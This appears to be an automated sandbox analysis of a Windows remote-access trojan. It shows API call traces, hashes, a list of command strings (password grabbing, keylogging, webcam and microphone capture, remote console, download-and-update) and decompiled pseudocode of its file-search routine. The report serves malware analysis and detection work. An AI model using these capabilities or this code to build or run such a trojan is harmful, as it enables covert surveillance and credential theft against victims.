                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000), ref: 0040B81C
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040B828
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040B837
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040B84B
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,msgbox), ref: 0040B862
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040B876
                                          • atoi.MSVCRT ref: 0040B87D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,-00010000), ref: 0040B892
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040B8A5
                                          • MessageBoxA.USER32 ref: 0040B8AE
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,keyinput), ref: 0040B8C2
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040B8D6
                                          • atoi.MSVCRT ref: 0040B8DD
                                            • Part of subcall function 0040E46D: SendInput.USER32(00000001,?,0000001C,00415268), ref: 0040E495
                                            • Part of subcall function 0040E46D: SendInput.USER32(00000001,00000001,0000001C), ref: 0040E4A6
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,mclick), ref: 0040B8F5
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040B909
                                          • atoi.MSVCRT ref: 0040B910
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040B920
                                          • atoi.MSVCRT ref: 0040B927
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040B937
                                          • atoi.MSVCRT ref: 0040B93E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A880
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,keepaliveoff), ref: 0040A988
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,deletefile), ref: 0040B60D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040B621
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040B628
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BC78
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BC8C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@V?$basic_string@$??0?$basic_string@?c_str@?$basic_string@$Hstd@@$??8std@@$V01@@$V10@0@$D@1@@atoi$?length@?$basic_string@D@std@@@std@@G@2@@std@@G@std@@$InputSleepV10@V12@$CountFileSendTickWindowgetenv$??0?$basic_ofstream@??4?$basic_string@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@?size@?$basic_string@?substr@?$basic_string@?write@?$basic_ostream@CloseD?$basic_ofstream@DeleteDownloadEventForegroundG@1@@HandleInfoLastLocalMessageTextTimeV01@V10@@_itoaexitprintf
                                          • String ID: AppData$OSpower$PowrProf.dll$SetSuspendState$autogetofflinelogs$clearlogins$clipboarddata$close$closeprocfromwindow$closewindow$cmdoutput$consolecmd$deletefile$deletekeylog$dlldata$dllurl$downloadfromlocaltofile$downloadfromurltofile$dwnldscr$emptyclipboard$execcom$filemgr$freecamcap$freescrcap$getcamlib$getclipboard$getofflinelogs$getproclist$getscrslist$getwindows$initcamcap$initfun$initializescrcap$initklfrm$initregedit$initremscript$keepaliveoff$keyinput$maxwindow$mclick$miccapture$msgbox$open$openaddress$ping$pong$prockill$proclist$pwgrab$restorewindow$scrcap$screenshotdata$scrslist$setclipboard$startonlinekl$stopmiccapture$stoponlinekl$uninstall$updatefromlocal$updatefromurl
                                          • API String ID: 4235549877-3954364873
                                          • Opcode ID: d40044fdd170cee578c73f860a99ad2946619398251b1fdaf39685dc429f8304
                                          • Instruction ID: 15dfb3fcceeeb11733fb975214f02c8d6630f90493aa5ef66b82fcebf2304a7a
                                          • Opcode Fuzzy Hash: d40044fdd170cee578c73f860a99ad2946619398251b1fdaf39685dc429f8304
                                          • Instruction Fuzzy Hash: DFC26271940219ABDF04A7A1EC5AEEE7738EF55304F10447AF502B20E1DFB89A89CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410858,?,?,758EFF80,00415268,7313CB00), ref: 0040BEBC
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040BECB
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040BEEE
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040BEF8
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,getdrives), ref: 0040BF0D
                                          • GetLogicalDriveStringsA.KERNEL32 ref: 0040BF22
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 0040BF38
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(004116FC,00000000,00000002), ref: 0040BF49
                                          • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 0040BF54
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040BF63
                                            • Part of subcall function 004083E6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,7313CB00), ref: 004083F4
                                            • Part of subcall function 004083E6: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004083FD
                                            • Part of subcall function 004083E6: GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00408415
                                            • Part of subcall function 004083E6: _itoa.MSVCRT ref: 0040841C
                                            • Part of subcall function 004083E6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00408432
                                            • Part of subcall function 004083E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040843A
                                            • Part of subcall function 004083E6: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 00408449
                                            • Part of subcall function 004083E6: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00408456
                                            • Part of subcall function 004083E6: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408462
                                            • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040846B
                                            • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408474
                                            • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040847D
                                            • Part of subcall function 004083E6: lstrlenA.KERNEL32(00000000), ref: 00408484
                                            • Part of subcall function 004083E6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040849A
                                            • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084A3
                                            • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084AC
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,driveslist,00415268,?,00415268,00000000), ref: 0040BF8D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,00000000), ref: 0040BF9A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00000000), ref: 0040BFA7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFC6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFCF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFDB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFE4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFED
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFB1
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,listfiles), ref: 0040C001
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C031
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C623
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C634
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@2@@0@V?$basic_string@$V01@@$D@1@@Hstd@@$?length@?$basic_string@V10@0@$??4?$basic_string@??8std@@?c_str@?$basic_string@?find@?$basic_string@DriveV01@V10@V12@$?data@?$basic_string@?resize@?$basic_string@?substr@?$basic_string@LogicalStringsTypeV10@@_itoalstrlen
                                          • String ID: Unable to rename file!$delete$download$driveslist$getdrives$listfiles$newfolder$open$open$rename$search$sendfiledata$showmsg$stopsearch$upload
                                          • API String ID: 3022309246-3399653838
                                          • Opcode ID: f69ad1251e661361170cebbda10b8b92ca4ecd91549d69f2b73608baae335c96
                                          • Instruction ID: d8c6c4d787ab652cc050522138cbe33c2e5dc8e9482fe9015d7f3b3e7ca7eb0a
                                          • Opcode Fuzzy Hash: f69ad1251e661361170cebbda10b8b92ca4ecd91549d69f2b73608baae335c96
                                          • Instruction Fuzzy Hash: 9B225C72900109ABDB04EBE1DD5E9EE7B7CEB44305F10057AF502F20D1EE795A89CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 17%
                                          			E00402C45(char** __ecx, void* __edx) {
                                          				char* _t96;
                                          				void* _t102;
                                          				void* _t116;
                                          				char* _t119;
                                          				void* _t121;
                                          				void* _t125;
                                          				void* _t127;
                                          				void* _t132;
                                          				void* _t135;
                                          				void* _t142;
                                          				void* _t153;
                                          				char _t158;
                                          				char _t165;
                                          				void* _t219;
                                          				void* _t220;
                                          				intOrPtr* _t221;
                                          				void* _t224;
                                          				void* _t228;
                                          				void* _t230;
                                          				intOrPtr _t231;
                                          				void* _t232;
                                          				void* _t237;
                                          				void* _t239;
                                          				void* _t250;
                                          
                                          				_t219 = __edx;
                                          				L0040FCDE();
                                          				_t231 = _t230 - 0x3b4;
                                          				 *((intOrPtr*)(_t228 - 0x10)) = _t231;
                                          				_t221 = __ecx;
                                          				_t96 = _t228 - 0x29c;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z(_t96, _t220, _t224, _t153);
                                          				 *__ecx =  *__ecx | 0xffffffff;
                                          				 *(_t228 - 4) = 0;
                                          				_push(6);
                                          				_push(1);
                                          				_push(0);
                                          				L0040FF26();
                                          				 *__ecx = _t96;
                                          				_push(0x10);
                                          				_push(0x415278);
                                          				_push(_t96);
                                          				L0040FF38();
                                          				if(_t96 != 0) {
                                          					L0040FC88();
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0, 0);
                                          					_push(atoi(_t96));
                                          					E00403474(_t228 + 0x28, _t219);
                                          					FindClose( *(_t228 - 0x14));
                                          					ExitThread(0);
                                          				}
                                          				_t232 = _t231 - 0x10;
                                          				_t102 = _t228 - 0x2b4;
                                          				L0040FC1A();
                                          				L0040FC14();
                                          				L0040FC14();
                                          				L0040FC14();
                                          				_t105 = E00402504(_t228 - 0x2d4, _t232, _t228 - 0x2d4, _t228 - 0x2d4, _t228 - 0x2c4, _t228 - 0x2c4);
                                          				_t237 = _t232 + 0x44;
                                          				asm("sbb ebx, ebx");
                                          				_t158 =  ~(_t105 + 1) + 1;
                                          				 *((char*)(_t228 - 0x2a0)) = _t158;
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t102, _t102, "searchstarted", 0x415268, _t228 + 0x28, 0x415268, _t228 + 0x38,  *__ecx);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				if(_t158 != 0) {
                                          					 *((intOrPtr*)(_t228 - 0x2d8)) = 1;
                                          					_push(0x411a80);
                                          					_t105 = _t228 - 0x2d8;
                                          					_push(_t228 - 0x2d8);
                                          					L0040FC88();
                                          				}
                                          				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          				E00403646(_t105, _t105, _t105, __imp__tolower);
                                          				L0040FC3E();
                                          				_t239 = _t237 + 0x1c;
                                          				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ(_t228 + 8, "*", _t228 - 0x274);
                                          				 *(_t228 - 0x14) = FindFirstFileW(_t228 - 0x2e8, _t228 - 0x2e8);
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				if( *(_t228 - 0x14) == 0xffffffff) {
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("searchwrongpath", _t228 - 0x2f0,  *_t221);
                                          					E00402504(_t228 - 0x2f0);
                                          					_t239 = _t239 - 0x10 + 0x14;
                                          					 *((intOrPtr*)(_t228 - 0x2f4)) = 2;
                                          					_push(0x411a80);
                                          					_push(_t228 - 0x2f4);
                                          					L0040FC88();
                                          				}
                                          				while(FindNextFileW( *(_t228 - 0x14), _t228 - 0x274) != 0) {
                                          					if(( *(_t228 - 0x274) & 0x00000010) != 0 && wcscmp(_t228 - 0x248, ".") != 0 && wcscmp(_t228 - 0x248, L"..") != 0) {
                                          						_t142 = _t228 - 0x248;
                                          						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t142, _t228 - 0x308, "\\");
                                          						L0040FC38();
                                          						L0040FC3E();
                                          						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t228 + 8, _t142);
                                          						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                          						_t239 = _t239 + 0x18;
                                          						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                          						if(E00403183(_t221, _t228 - 0x294, _t228 + 0x18, _t228 - 0x294, _t228 - 0x318, _t228 - 0x318) == 0) {
                                          							 *((intOrPtr*)(_t228 - 0x324)) = 3;
                                          							_push(0x411a80);
                                          							_push(_t228 - 0x324);
                                          							L0040FC88();
                                          						}
                                          						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          					}
                                          					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t228 - 0x248, _t228 - 0x328);
                                          					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          					E00403646(_t228 - 0x248, _t228 - 0x248, _t228 - 0x248, __imp__tolower);
                                          					_t239 = _t239 + 0x10;
                                          					_t125 = _t228 + 0x18;
                                          					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t125, 0);
                                          					if(_t125 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                          						_t127 = _t228 - 0x274;
                                          						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t127, 0x250, _t228 - 0x33c);
                                          						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t127);
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						_t250 = _t239 - 0x10;
                                          						_t132 = _t228 - 0x364;
                                          						L0040FC1A();
                                          						L0040FC14();
                                          						L0040FC14();
                                          						L0040FC14();
                                          						_t135 = E00402504(_t228 - 0x384, _t250, _t228 - 0x384, _t228 - 0x384, _t228 - 0x374, _t228 - 0x374);
                                          						_t239 = _t250 + 0x44;
                                          						asm("sbb ebx, ebx");
                                          						_t165 =  ~(_t135 + 1) + 1;
                                          						 *((char*)(_t228 - 0x340)) = _t165;
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t132, _t132, "filefound", 0x415268, E0040EDD3(_t228 - 0x354, _t228 + 8), 0x415268, _t228 - 0x24,  *_t221);
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						if(_t165 != 0) {
                                          							 *((intOrPtr*)(_t228 - 0x388)) = 4;
                                          							_push(0x411a80);
                                          							_push(_t228 - 0x388);
                                          							L0040FC88();
                                          						}
                                          					}
                                          					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				}
                                          				 *(_t228 - 4) =  *(_t228 - 4) | 0xffffffff;
                                          				FindClose( *(_t228 - 0x14));
                                          				_t116 = _t228 - 0x39c;
                                          				L0040FC1A();
                                          				L0040FC14();
                                          				L0040FC14();
                                          				L0040FC14();
                                          				_t119 = E00402504(_t228 - 0x3bc, _t239 - 0x10, _t228 - 0x3bc, _t228 - 0x3bc, _t228 - 0x3ac, _t228 - 0x3ac);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t116, _t116, "searchfinished", 0x415268, _t228 + 0x28, 0x415268, _t228 + 0x38,  *_t221);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t121 = E00403474(_t228 + 0x28, _t219);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(atoi(_t119));
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
                                          				return _t121;
                                          			}



























                                          0x00402c45
                                          0x00402c4a
                                          0x00402c4f
                                          0x00402c58
                                          0x00402c5b
                                          0x00402c5d
                                          0x00402c67
                                          0x00402c6d
                                          0x00402c72
                                          0x00402c75
                                          0x00402c77
                                          0x00402c79
                                          0x00402c7a
                                          0x00402c7f
                                          0x00402c81
                                          0x00402c83
                                          0x00402c88
                                          0x00402c89
                                          0x00402c90
                                          0x0040314f
                                          0x00403157
                                          0x00403164
                                          0x00403165
                                          0x0040316f
                                          0x00403177
                                          0x00403177
                                          0x00402c98
                                          0x00402cb1
                                          0x00402cb8
                                          0x00402cc8
                                          0x00402cd8
                                          0x00402ce2
                                          0x00402cea
                                          0x00402cef
                                          0x00402cf7
                                          0x00402cf9
                                          0x00402cfa
                                          0x00402d06
                                          0x00402d12
                                          0x00402d1e
                                          0x00402d26
                                          0x00402d28
                                          0x00402d32
                                          0x00402d37
                                          0x00402d3d
                                          0x00402d3e
                                          0x00402d3e
                                          0x00402d4c
                                          0x00402d56
                                          0x00402d60
                                          0x00402d67
                                          0x00402d86
                                          0x00402d8b
                                          0x00402d90
                                          0x00402d9d
                                          0x00402da6
                                          0x00402db0
                                          0x00402dc5
                                          0x00402dcb
                                          0x00402dd0
                                          0x00402dd3
                                          0x00402ddd
                                          0x00402de8
                                          0x00402de9
                                          0x00402de9
                                          0x00402dee
                                          0x00402e0d
                                          0x00402e55
                                          0x00402e62
                                          0x00402e74
                                          0x00402e84
                                          0x00402e92
                                          0x00402e9e
                                          0x00402ead
                                          0x00402eb3
                                          0x00402ebf
                                          0x00402ece
                                          0x00402ed0
                                          0x00402eda
                                          0x00402ee5
                                          0x00402ee6
                                          0x00402ee6
                                          0x00402ef1
                                          0x00402ef1
                                          0x00402f0b
                                          0x00402f1d
                                          0x00402f2a
                                          0x00402f37
                                          0x00402f3e
                                          0x00402f43
                                          0x00402f48
                                          0x00402f52
                                          0x00402f60
                                          0x00402f72
                                          0x00402f7f
                                          0x00402f89
                                          0x00402f95
                                          0x00402f9d
                                          0x00402fc0
                                          0x00402fc7
                                          0x00402fd7
                                          0x00402fe7
                                          0x00402ff1
                                          0x00402ff9
                                          0x00402ffe
                                          0x00403006
                                          0x00403008
                                          0x00403009
                                          0x00403015
                                          0x00403021
                                          0x0040302d
                                          0x00403039
                                          0x00403041
                                          0x00403043
                                          0x0040304d
                                          0x00403058
                                          0x00403059
                                          0x00403059
                                          0x00403041
                                          0x00403064
                                          0x00403064
                                          0x0040306f
